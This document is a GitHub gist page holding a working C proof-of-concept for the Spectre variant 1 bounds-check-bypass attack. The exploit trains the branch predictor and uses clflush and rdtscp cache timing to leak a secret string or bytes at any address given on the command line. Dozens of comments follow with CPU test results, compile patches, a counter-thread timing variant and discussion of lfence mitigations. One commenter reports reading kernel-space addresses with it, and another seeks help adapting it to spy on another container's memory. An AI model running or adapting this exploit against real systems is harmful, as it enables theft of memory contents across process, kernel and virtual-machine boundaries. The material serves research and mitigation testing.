| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif | |
| /******************************************************************** | |
| Victim code. | |
| ********************************************************************/ | |
/* Bound used by victim_function's check; deliberately much smaller than
 * array1 itself so an out-of-bounds index is architecturally rejected
 * while the speculative path may still read it. */
unsigned int array1_size = 16;
/* Padding on either side of array1 -- presumably to keep it off the cache
 * lines of its neighbours; not verified here. */
uint8_t unused1[64];
/* The in-bounds data: only the first 16 of 160 bytes are non-zero. */
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
/* Probe buffer: one 512-byte slot per possible byte value (256 slots). */
uint8_t array2[256 * 512];
/* The value the analysis code tries to recover through the cache. */
char * secret = "The Magic Words are Squeamish Ossifrage.";
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
/*
 * Spectre variant 1 (bounds-check bypass) gadget.
 *
 * x: caller-supplied index.  Architecturally array1[x] is only read when
 *    x < array1_size.  Speculatively, a mispredicted branch can perform the
 *    read for any x, and the dependent load array2[array1[x] * 512] leaves a
 *    cache line whose position encodes the leaked byte (see readMemoryByte).
 *
 * Mitigation raised in the discussion below: a speculation barrier such as
 * _mm_lfence() placed after the bounds check and before the array1[x] read.
 * Reporters note that on some AMD parts LFENCE only acts as a barrier once
 * a kernel-controlled MSR enables it, so the fence alone is not portable.
 */
void victim_function(size_t x) {
  if (x < array1_size) {
    /* &= keeps the access observable to the compiler; the value is discarded */
    temp &= array2[array1[x] * 512];
  }
}
| /******************************************************************** | |
| Analysis code | |
| ********************************************************************/ | |
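/* Cycle count at or below which a probe read counts as a cache hit.
 * The original `#define CACHE_HIT_THRESHOLD(80)` (no space) declared a
 * function-like macro with an invalid parameter and failed to preprocess.
 * Machine dependent: reporters below needed anywhere from 30 to 200. */
#define CACHE_HIT_THRESHOLD (80)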
| /* Report best guess in value[0] and runner-up in value[1] */ | |
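/*
 * Recover one byte at array1 + malicious_x through the cache side channel
 * left by victim_function's speculative execution.
 *
 * malicious_x  offset from array1 of the byte to leak (normally out of bounds).
 * value[2]     out: best guess in value[0], runner-up in value[1].
 * score[2]     out: hit tallies for the two guesses.
 *
 * Per try: flush every probe line of array2, then make 30 calls into
 * victim_function -- five in-bounds "training" calls for each out-of-bounds
 * call -- flushing array1_size first so the bounds check resolves late and
 * the predictor keeps following the trained in-bounds path.  Then time a
 * read of each probe line; the line the speculative array2[array1[x] * 512]
 * access pulled in reads fast and earns a point.  Stops early once one value
 * clearly dominates.
 */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
  static int results[256];
  int tries, i, j, k, mix_i;
  /* __rdtscp() stores TSC_AUX through an unsigned int *; the original `int`
   * did not match that signature and was rejected by some compilers. */
  unsigned int junk = 0;
  size_t training_x, x;
  uint64_t time1, time2;
  volatile uint8_t * addr;
  for (i = 0; i < 256; i++)
    results[i] = 0;
  for (tries = 999; tries > 0; tries--) {
    /* Flush array2[512*(0..255)] from cache so every probe line starts cold */
    for (i = 0; i < 256; i++)
      _mm_clflush( & array2[i * 512]); /* intrinsic for clflush instruction */
    /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
    training_x = tries % array1_size;
    for (j = 29; j >= 0; j--) {
      _mm_clflush( & array1_size); /* bounds check now depends on an uncached load */
      for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
      /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
      /* Avoid jumps in case those tip off the branch predictor */
      x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
      x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
      x = training_x ^ (x & (malicious_x ^ training_x)); /* branch-free select */
      /* Call the victim! */
      victim_function(x);
    }
    /* Time reads. Order is lightly mixed up to prevent stride prediction.
     * rdtscp is missing on some older CPUs; reporters below substituted __rdtsc(). */
    for (i = 0; i < 256; i++) {
      mix_i = ((i * 167) + 13) & 255;
      addr = & array2[mix_i * 512];
      time1 = __rdtscp( & junk); /* READ TIMER */
      junk = * addr; /* MEMORY ACCESS TO TIME */
      time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
      /* Count a hit, except for the line the in-bounds training calls touched */
      if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
        results[mix_i]++; /* cache hit - add +1 to score for this value */
    }
    /* Locate highest & second-highest results tallies in j/k */
    j = k = -1;
    for (i = 0; i < 256; i++) {
      if (j < 0 || results[i] >= results[j]) {
        k = j;
        j = i;
      } else if (k < 0 || results[i] >= results[k]) {
        k = i;
      }
    }
    if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
      break; /* Clear success if best is > 2*runner-up + 5 or 2/0 */
  }
  results[0] ^= junk; /* use junk so code above won't get optimized out */
  value[0] = (uint8_t) j;
  score[0] = results[j];
  value[1] = (uint8_t) k;
  score[1] = results[k];
}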
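/*
 * Entry point.  Usage: spectre [ADDRESS LENGTH]
 *
 * With no arguments, leaks the 40 bytes of `secret`.  With two arguments,
 * leaks LENGTH bytes starting at ADDRESS (parsed with %p).  ADDRESS is
 * attacker-chosen by design -- this is an exploit harness -- so it is only
 * validated for parse success, not for range.
 *
 * Fixes versus the original: `'?'` instead of `"?"` (a char * was being
 * passed to %c), the array2 loop index is size_t (sizeof comparison),
 * sscanf results are checked, and the address is parsed into a void *
 * instead of through a size_t * cast.
 */
int main(int argc,
  const char * * argv) {
  size_t malicious_x = (size_t)(secret - (char * ) array1); /* default: offset from array1 to secret */
  int score[2], len = 40;
  uint8_t value[2];
  size_t i;
  for (i = 0; i < sizeof(array2); i++)
    array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
  if (argc == 3) {
    void * target = NULL;
    if (sscanf(argv[1], "%p", & target) != 1 || sscanf(argv[2], "%d", & len) != 1) {
      fprintf(stderr, "usage: %s [address length]\n", argv[0]);
      return 1;
    }
    /* Convert the absolute address into an offset from array1 (integer arithmetic) */
    malicious_x = (size_t) target - (size_t) array1;
  }
  printf("Reading %d bytes:\n", len);
  while (--len >= 0) {
    printf("Reading at malicious_x = %p... ", (void * ) malicious_x);
    readMemoryByte(malicious_x++, value, score);
    printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
    printf("0x%02X=’%c’ score=%d ", value[0],
      (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
    if (score[1] > 0)
      printf("(second best: 0x%02X score=%d)", value[1], score[1]);
    printf("\n");
  }
  return (0);
}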
kuhar
commented
Jan 4, 2018
tommythorn
commented
Jan 4, 2018
I was going to say that, but also the parentheses around |
tommythorn
commented
Jan 4, 2018
BTW, thanks for this. I hadn't fully appreciated how easy this is to deploy. |
crozone
commented
Jan 4, 2018
I made the I upped the EDIT: I did some more experimenting with the EDIT 2: Full project and fixed code here: https://github.com/crozone/SpectrePoC |
progman32
commented
Jan 4, 2018
Thanks for posting this. With some slight tweaking[1], I was able to recover the secret on an ancient pentium-m 1.50ghz from 2004 or 2005. This issue has existed for a while 50c50
< #define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
---
> #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
89c89
< time1 = __rdtscp( & junk); /* READ TIMER */
---
> time1 = __rdtsc(); /* READ TIMER */
91c91
< time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
---
> time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */Compiled under gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3) with
[1] Space fix as mentioned earlier in thread, and using |
Saxtheowl
commented
Jan 4, 2018
Wow nice :) |
kfrz
commented
Jan 4, 2018
Fascinating, and terrifying. |
splitbrain
commented
Jan 4, 2018
Had to change |
teh-monad
commented
Jan 4, 2018
Thanks for sharing.
beatcracker
commented
Jan 4, 2018
Trying to compile it on
Tried different options for P.S. |
beatcracker
commented
Jan 4, 2018
Here is my result
I've played with |
blackjec69
commented
Jan 4, 2018
If compile without any "-march" -
UPD gcc-5, ubuntu 16.04 x86-64
awt135
commented
Jan 4, 2018
ghost
commented
Jan 4, 2018
Works just fine on Opteron 4170 HE under FreeBSD. Fantastic. |
diimdeep
commented
Jan 4, 2018
i5-4288U CPU @ 2.60GHz
Symbian9
commented
Jan 4, 2018
Source: https://www.linux.org.ru/news/security/13934697?cid=13935544 |
midnightpizza
commented
Jan 4, 2018
Interesting, FX-8320 always returns: with cache hit threshold 100
.. just score 2 all the way? hmm otherwise at default (80)
But with an AMD Opteron(tm) Processor 4122 > (100) (same with (80))
Both Kernel 4.9.73, grsec |
Symbian9
commented
Jan 4, 2018
With patches
It compiled but test not reproduced
If try add
CPU info
OS info
So, my PC secured from |
i336
commented
Jan 4, 2018
Using progman32's modifications I'm able to run this on my ThinkPad T43. Each read reports For reference, I'm using
Question: What is the oldest CPU this is likely to work on? progman32 mentions that |
annmuor
commented
Jan 4, 2018
Arch, 4.14.5, i5-5250U works. Changed address to kernel space table and got address of sys_read. |
62726164
commented
Jan 4, 2018
Maybe add a simple Makefile. Something like this:
eyes-0nly
commented
Jan 4, 2018
i5-3230M CPU @ 2.60GHz
DooMMasteR
commented
Jan 4, 2018
On my
It works with a |
Symbian9
commented
Jan 4, 2018
UPD: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2311002 Its look like with additional patches from https://www.linux.org.ru/news/security/13934697?cid=13935709
This PoC also reproduced on 64-bit
Sadly, but |
tista3
commented
Jan 4, 2018
Ubuntu 17.10 ??? SUCCESS!! ./spectre |
lasse-kristensen
commented
Jan 4, 2018
I just updated a Centos 7 server with the new kernel 3.10.0-693.11.6.el7.x86_64, but i still get "The Magic Words", is that intended? |
klugemonkey
commented
Jan 4, 2018
Debian 4.14.11 (patched for Meltdown), Xeon E5-1660, CACHE_HIT_THRESHOLD (30), gcc 7.2.0-18 |
spartanthe
commented
Jan 4, 2018
Just to verify it's not fake, at Line 130: printf("Reading %d bytes:\n", len); in debugger Interactive
OK, then continue run:
Vulnerable: Intel Core i7-5600U CPU @ 2.60GHz, Win10x64 |
ykanello
commented
Jan 4, 2018
So far has worked for me on: (I had to change buffer sizes and play with some syntax to make it compile in all the above mentioned systems but basically is the same code) |
klugemonkey
commented
Jan 4, 2018
Kernel patch for KPTI is only applicable to Meltdown, not Spectre. Use dmesg | grep "isolation" to see if your kernel is patched. |
klugemonkey
commented
Jan 4, 2018
Still can't seem to get it to work on Xeon E5-2690 v2 that is reported by OpenVZ (kernel 2.6.32). Not sure if being a virtualized CPU skews the timings or if it's just not working with my gcc 4.9.2. Seems like it gets a few characters sometimes. |
LionsAd
commented
Jan 4, 2018
I needed the following patch, but then works fine on Mac OS X.
--- spectre.c.old 2018-01-04 15:13:32.000000000 +0100
+++ spectre.c 2018-01-04 15:11:45.000000000 +0100
@@ -47,12 +47,13 @@
/********************************************************************
Analysis code
********************************************************************/
-#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
- int tries, i, j, k, mix_i, junk = 0;
+ int tries, i, j, k, mix_i;
+ unsigned int junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t * addr;
@@ -133,7 +134,7 @@
readMemoryByte(malicious_x++, value, score);
printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[0],
- (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
+ (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n"); |
romansavrulin
commented
Jan 4, 2018
Works on macbook 12
jedisct1
commented
Jan 4, 2018
Works with minor changes on OpenBSD-current: https://gist.github.com/jedisct1/3bbb6e50b768968c30629bf734ea49c6/6ede3c9a3356a4a55a27febaf38157897c4fed09 |
hyc
commented
Jan 4, 2018
No success on my Q9300. gcc 5.4.0, Linux 4.4.0 (Ubuntu) |
jedisct1
commented
Jan 4, 2018
It works on Google Cloud shell. Was it expected? |
LionsAd
commented
Jan 4, 2018
I got it to work without rdtsc but just with a counter thread (like in the webworker example in JS):
--- spectre.c 2018-01-04 15:30:03.000000000 +0100
+++ spectre-thread.c 2018-01-04 15:59:48.000000000 +0100
@@ -1,6 +1,8 @@
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
+#include <pthread.h>
+
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
@@ -45,6 +47,22 @@
}
/********************************************************************
+Thread code
+********************************************************************/
+int counter_thread_ended = 0;
+uint32_t counter = 0;
+
+void *counter_function(void *x_void_ptr)
+{
+ while (!counter_thread_ended) {
+ counter++;
+ }
+
+ printf("counter thread finished\n");
+ return NULL;
+}
+
+/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
@@ -87,9 +105,9 @@
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
- time1 = __rdtscp( & junk); /* READ TIMER */
+ time1 = counter; /* READ TIMER */
junk = * addr; /* MEMORY ACCESS TO TIME */
- time2 = __rdtscp( & junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
+ time2 = counter - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
@@ -120,6 +138,15 @@
int i, score[2], len = 40;
uint8_t value[2];
+ // Setup the counter thread.
+ pthread_t counter_thread;
+
+ if (pthread_create(&counter_thread, NULL, counter_function, NULL)) {
+ fprintf(stderr, "Error creating thread\n");
+ return 1;
+ }
+ // End Setup
+
for (i = 0; i < sizeof(array2); i++)
array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */
if (argc == 3) {
@@ -139,5 +166,14 @@
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
+
+ // Start: Exit counter thread
+ counter_thread_ended = 1;
+ if (pthread_join(counter_thread, NULL)) {
+ fprintf(stderr, "Error joining thread\n");
+ return 2;
+ }
+ // End: Exit counter thread
+
return (0);
}The accuracy obviously varies a little, but I can get the right result in most runs. That means this can now be also tested on non-mobile Pentium I, II and III ... |
LionsAd
commented
Jan 4, 2018
@i336 I just posted a version using only threads and no rdtsc instruction, so it should work on all processors that have dynamic branch prediction. |
C37H40O9
commented
Jan 4, 2018
openSUSE Leap 42.3 with patch |
hyc
commented
Jan 4, 2018
@LionsAd no success on my Q9300 with this version either. |
KeT4yn
commented
Jan 4, 2018
Can you drop here compiled win application to test? |
diimdeep
commented
Jan 4, 2018
ARM anyone ? |
heeen
commented
Jan 4, 2018
Works on AMD Ryzen Threadripper 1950X 16-Core Processor |
LionsAd
commented
Jan 4, 2018
@hyc Can you post your output, please? I also added statistics, which you could run and put in pastebin here: https://gist.github.com/LionsAd/5116c9cd37f5805c797ed16fafbe93e4 |
spartanthe
commented
Jan 4, 2018
BTW, who can explain me how this piece of code works?
LionsAd
commented
Jan 4, 2018
I have trouble with the threaded code to get a clear result, but unclear still works fine. However the 0x00 and 0x01 location in array2 seem to be sometimes cached or at least have significantly lower access times as the other ones (Mac OS X). |
aburlak
commented
Jan 4, 2018
Mitigating against this:
It's important that _mm_lfence is after the bounds check, but before data access. |
kingsumos
commented
Jan 4, 2018
Results on Intel(R) Atom(TM) CPU C3558 Reading at malicious_x = 0xffffffffffdffb20... Success: 0x54=’T’ score=2 |
ktdd
commented
Jan 4, 2018
Two debian servers I run: Reading 40 bytes: etc Windows 10 Insider 17063: Reading 40 bytes: |
ssstonebraker
commented
Jan 4, 2018
Does this script detect both spectre and meltdown? |
faew
commented
Jan 4, 2018
CentOS 3.10.0-693.11.6.el7.x86_64 gcc --std=c99 spectre.c -o spectre |
yvoinov
commented
Jan 4, 2018
Intel Xeon. Solaris 10 kernel Generic_150401-58 Threaded version (original gives core dump - illegal instruction) gcc -std=c99 -o spectre spectre.c ./spectreReading 40 bytes: |
yvoinov
commented
Jan 4, 2018
Solaris 10 kernel Generic_150401-58 ./spectreReading 40 bytes: |
7r0
commented
Jan 4, 2018
Win10 16299 x86
x64
7r0
commented
Jan 4, 2018
AWS
Google Cloud
liamsomerville
commented
Jan 4, 2018
no success on mac osx 10.13.1 |
jboger
commented
Jan 4, 2018
macos 10.13.2 (2,8 GHz Intel Core i7) Reading 40 bytes: |
ferreirasc
commented
Jan 4, 2018
macOS 10.12.6 (1.6GHz i5):
citycat4
commented
Jan 4, 2018
Compiled succesful, but run unclean.
BUT - working with threaded version of spectre from here - https://gist.github.com/LionsAd/5116c9cd37f5805c797ed16fafbe93e4
Calculate Linux 17
StallmanSlave
commented
Jan 4, 2018
Having a hard time trying to compile to code on
Anyone have that? |
imarki360
commented
Jan 4, 2018
Works on the following:
citycat4
commented
Jan 4, 2018
But - unclear run on VM (CentOS 6, run only threaded version, non-threaded does not compile - no __rdtsc):
tolunayozturk
commented
Jan 4, 2018
Intel(R) Core(TM) i5-5257U CPU @ 2.70GHz gcc --std=c99 -o spectre spectre.c
banderlog
commented
Jan 4, 2018
Genuine Intel(R) CPU U7300 @ 1.30GHz Results for original spectre.c
Results for patched spectre.c (CACHE_HIT_THRESHOLD (100), __rdtsc() instead of __rtdscp()):
Playing with CACHE_HIT_THRESHOLD size did not help much. With >300 it shows more success, but symbols are incorrect. |
ndurbinsynchr
commented
Jan 4, 2018
Running: $ lscpu | grep CPU Had to make to changes for the spectre.c to complie: -(value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]); Results: $ ./spectre |
citycat4
commented
Jan 4, 2018
Also works against more old home system:
Calculate Linux 17
citycat4
commented
Jan 4, 2018
@banderlog, try to decrease CACHE_HIT. I have tried to run with 60 and receive partially "clean" run. Decrease to 50 - and receive full "clean" run |
Gungthar
commented
Jan 4, 2018
Result: /proc/cpuinfo: processor : 0 processor : 1 |
LionsAd
commented
Jan 4, 2018
@banderlog I would try with more runs (9999 instead of 999) and also use an even higher threshold (130) and also try with a way lower one (e.g. 60). |
plotkin1996
commented
Jan 4, 2018
Added space before (80).
Total success with scope=2 on everything. |
lordlorenzcode
commented
Jan 4, 2018
ssstonebraker
commented
Jan 4, 2018
tomwisniewskiprv
commented
Jan 4, 2018
Worked just fine on my linux with : model name : Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz On Windows I had to compile it with -march=native and the results are : Reading at malicious_x = 00001024... Success: 0x54=ÔÇÖTÔÇÖ score=2 |
imarki360
commented
Jan 4, 2018
@ssstonebraker There are two vulnerabilities- "Meltdown" and "Spectre". The patched kernel fixes Meltdown, but there is no fix (yet) for Spectre. |
mancubus77
commented
Jan 4, 2018
Compilation:
ziacik
commented
Jan 4, 2018
With @LionsAd's patches success on macOS 10.13.2, Intel Core i3-540 |
te11ur
commented
Jan 4, 2018
windows 7, intel-core(i5)-3317U Reading 40 bytes: |
oschonrock
commented
Jan 4, 2018
**Edit: On FreeBSD 11.1 with clang 4 compiles fine with the __rdtscp, same AMD Opteron 4386..and secret revealed at threshhold 200 ** clang --version
FreeBSD clang version 4.0.0 (tags/RELEASE_400/final 297347) (based on LLVM 4.0.0)
Target: x86_64-unknown-freebsd11.1
clang -O0 spectre.c -ospectre && ./spectre
diff -u spectre.c.orig spectre.c
--- spectre.c.orig 2018-01-04 23:36:24.169168000 +0000
+++ spectre.c 2018-01-04 23:31:08.121980000 +0000
@@ -47,12 +47,13 @@
/********************************************************************
Analysis code
********************************************************************/
-#define CACHE_HIT_THRESHOLD(80) /* assume cache hit if time <= threshold */
+#define CACHE_HIT_THRESHOLD (200) /* assume cache hit if time <= threshold */
/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
static int results[256];
- int tries, i, j, k, mix_i, junk = 0;
+ int tries, i, j, k, mix_i;
+ unsigned int junk = 0;
size_t training_x, x;
register uint64_t time1, time2;
volatile uint8_t * addr;
@@ -133,10 +134,10 @@
readMemoryByte(malicious_x++, value, score);
printf("%s: ", (score[0] >= 2 * score[1] ? "Success" : "Unclear"));
printf("0x%02X=’%c’ score=%d ", value[0],
- (value[0] > 31 && value[0] < 127 ? value[0] : "?"), score[0]);
+ (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
if (score[1] > 0)
printf("(second best: 0x%02X score=%d)", value[1], score[1]);
printf("\n");
}
return (0);
-}
\ No newline at end of file
+}
AMD broken as well!
utf8everywhere
commented
Jan 5, 2018
@progman32 replacing |
nextco
commented
Jan 5, 2018
Linux Arch 4.14.9-1-ARCH #1 SMP PREEMPT Tue Dec 26 00:18:37 UTC 2017 x86_64 GNU/Linux $ lscpu Architecture: x86_64 CPU op-mode(s): 32-bit, 64-bit Byte Order: Little Endian CPU(s): 2 On-line CPU(s) list: 0,1 Thread(s) per core: 1 Core(s) per socket: 2 Socket(s): 1 NUMA node(s): 1 Vendor ID: GenuineIntel CPU family: 6 Model: 42 Model name: Intel(R) Core(TM) i7-2700K CPU @ 3.50GHz Stepping: 7 CPU MHz: 3492.070 BogoMIPS: 6986.14 Hypervisor vendor: KVM Virtualization type: full L1d cache: 32K L1i cache: 32K L2 cache: 256K L3 cache: 8192K NUMA node0 CPU(s): 0,1 Flags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx rdtscp lm constant_tsc rep_good nopl xtopology nonstop_tsc cpuid pni pclmulqdq ssse3 cx16 sse4_1 sse4_2 x2apic popcnt aes xsave avx hypervisor lahf_lm $ ./spectre Reading 40 bytes: Reading at malicious_x = 0xffffffffffdfedc8... Success: 0x54=’T’ score=2 Reading at malicious_x = 0xffffffffffdfedc9... Success: 0x68=’h’ score=19 (second best: 0x05 score=7) Reading at malicious_x = 0xffffffffffdfedca... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfedcb... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfedcc... Success: 0x4D=’M’ score=2 Reading at malicious_x = 0xffffffffffdfedcd... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfedce... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffffffffdfedcf... Success: 0x69=’i’ score=17 (second best: 0x05 score=6) Reading at malicious_x = 0xffffffffffdfedd0... Success: 0x63=’c’ score=2 Reading at malicious_x = 0xffffffffffdfedd1... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfedd2... Success: 0x57=’W’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd3... Success: 0x6F=’o’ score=2 Reading at malicious_x = 0xffffffffffdfedd4... Success: 0x72=’r’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd5... 
Success: 0x64=’d’ score=2 Reading at malicious_x = 0xffffffffffdfedd6... Success: 0x73=’s’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd7... Success: 0x20=’ ’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedd8... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfedd9... Success: 0x72=’r’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfedda... Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfeddb... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfeddc... Success: 0x53=’S’ score=2 Reading at malicious_x = 0xffffffffffdfeddd... Success: 0x71=’q’ score=2 Reading at malicious_x = 0xffffffffffdfedde... Success: 0x75=’u’ score=2 Reading at malicious_x = 0xffffffffffdfeddf... Success: 0x65=’e’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfede0... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfede1... Success: 0x6D=’m’ score=2 Reading at malicious_x = 0xffffffffffdfede2... Success: 0x69=’i’ score=31 (second best: 0x00 score=12) Reading at malicious_x = 0xffffffffffdfede3... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfede4... Success: 0x68=’h’ score=2 Reading at malicious_x = 0xffffffffffdfede5... Success: 0x20=’ ’ score=2 Reading at malicious_x = 0xffffffffffdfede6... Success: 0x4F=’O’ score=2 Reading at malicious_x = 0xffffffffffdfede7... Success: 0x73=’s’ score=7 (second best: 0x05 score=1) Reading at malicious_x = 0xffffffffffdfede8... Success: 0x73=’s’ score=2 Reading at malicious_x = 0xffffffffffdfede9... Success: 0x69=’i’ score=2 Reading at malicious_x = 0xffffffffffdfedea... Success: 0x66=’f’ score=2 Reading at malicious_x = 0xffffffffffdfedeb... Success: 0x72=’r’ score=2 Reading at malicious_x = 0xffffffffffdfedec... Success: 0x61=’a’ score=2 Reading at malicious_x = 0xffffffffffdfeded... Success: 0x67=’g’ score=2 Reading at malicious_x = 0xffffffffffdfedee... 
Success: 0x65=’e’ score=2 Reading at malicious_x = 0xffffffffffdfedef... Success: 0x2E=’.’ score=2 |
ghost
commented
Jan 5, 2018
@StallmanSlave There are some issues that need to be fixed
rich0
commented
Jan 5, 2018
I added the "_mm_lfence();" mitigation on my Ryzen 5, and the exploit still worked. Is this an Intel-specific mitigation, or perhaps it doesn't work on Ryzen in particular? The same was true using asm ("lfence"); Edit: I found that this also doesn't work on a Phenom II. So, that lfence fix might be Intel-specifc. I'm not sure what others are seeing. My source is at: https://gist.github.com/rich0/056eebebc1f88a624e36680e0de36011 |
ssstonebraker
commented
Jan 5, 2018
@imarki360 is there c code like this one to prove that meltdown is fixed on a patched system? Why does Microsoft and Redhat say that their fixes address spectre if they really don't? Sorry I'm a bit confused here would you mind explaining it? |
crozone
commented
Jan 5, 2018
I have a repository set up with the fixed code, makefile, and a results issue: https://github.com/crozone/SpectrePoC We might want to start documenting the results under the results issue. @ErikAugust I've given you attribution, but let me know if this isn't OK. |
ghost
commented
Jan 5, 2018
$ uname -a $ lscpu
$ ./spectre.out
uhhi
commented
Jan 5, 2018
Can this code really show that reading other processes memory is possible? Shouldn't it have some additional code that creates a process or some way to run a second process without the secret? |
crozone
commented
Jan 5, 2018
@uhhi You can run it with an arbitrary address and length as the first and second command line argument. |
threatinteltest
commented
Jan 5, 2018
uname -a ./spectre.out |
Reslient
commented
Jan 5, 2018
issue is output like gcc -std=c99 -O0 spectre.c -o spectre -march=native |
aburlak
commented
Jan 5, 2018
Interesting. Apparently, on AMD, whether or not LFENCE is effective as no-spec barrier depends on hardware MSR (MSR_F10H_DECFG) - so, you need a patched kernel to use LFENCE as a no-speculation barrier. It certainly looks like these changes were made by SUSE so that the usermode applications could use LFENCE as an inexpensive way to stop data dependencies from propagating beyond the bounds check. LFENCE is also currently being discussed on LKML as a way to implement similar checks Edit: the MSR_F10H_DECFG / MSR_F10H_DECFG_LFENCE_SERIALIZE_BIT patch has just been submitted to LKML: |
eyablokov
commented
Jan 5, 2018
MacBook Pro 15" with Touch Bar 2016 ~ → ./spectre --- spectre.c.old 2018-01-05 08:46:35.000000000 +0300 /* Report best guess in value[0] and runner-up in value[1] */
LionsAd
commented
Jan 5, 2018
@utf8everywhere Replacing won't work for more modern processors without the fence, but using my threaded version at https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6#gistcomment-2311156 should work everywhere. |
jamver
commented
Jan 5, 2018
|
Integrating all fixes above, with threading and displaying full secret and initialised recovered secret variables at top and final values at end. Compiles with clang on Mac OS X and gcc on Linux (CentOS). Diff against original gist
Intel® Core(TM) i7-7820HQ CPU @ 2.90GHz (MacBookPro14,3 - 2017 15" MacBook Pro with Touchbar)
Intel(R) Xeon(R) CPU E5-2620 v3 @ 2.40GHz (CentOS Linux)
Full source code
zoobab
commented
Jan 5, 2018
|
I need some help to split the code in a client/server to try to spy on the memory of another container (OpenVZ or Docker in this case): I have put a sleep 1000 after sscanf_s(argv[2], "%d", &len); I need to mod the code that the client manages to dump the memory of the server. This would be useful as well for other types of virtualization (kvm, vmware, etc...). |
Create-personal
commented
Jan 5, 2018
|
model name : Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz /spectre$ gcc -std=c99 -O0 spectre.c -o spectre Reading 40 bytes: |
JonDaniel
commented
Jan 5, 2018
|
I don't think RedHat's fix has worked - https://access.redhat.com/security/vulnerabilities/speculativeexecution |
rich0
commented
Jan 5, 2018
|
@JonDaniel This is variant 1, and it can't be fixed with an OS update, unless it includes some kind of compiler fix to automatically apply mitigation and I don't think one exists just yet (though that could change at any time since it seems to be an area of activity). I don't know what was in the RH patch, but I suspect it just fixed the known-vulnerable function in the kernel. That would prevent that specific function from being attacked, but not other functions that have the same vulnerability. Think of variant 1 as a class of vulnerabilities, like a buffer overflow. You can fix a particular buffer overflow, but fixing them all requires changing how you write software, or building prevention into the compilers/language. That isn't a perfect analogy - this does rely on CPU behavior but it is still the case that any process that can interact with another process could contain vulnerable code. |
paulie51
commented
Jan 5, 2018
|
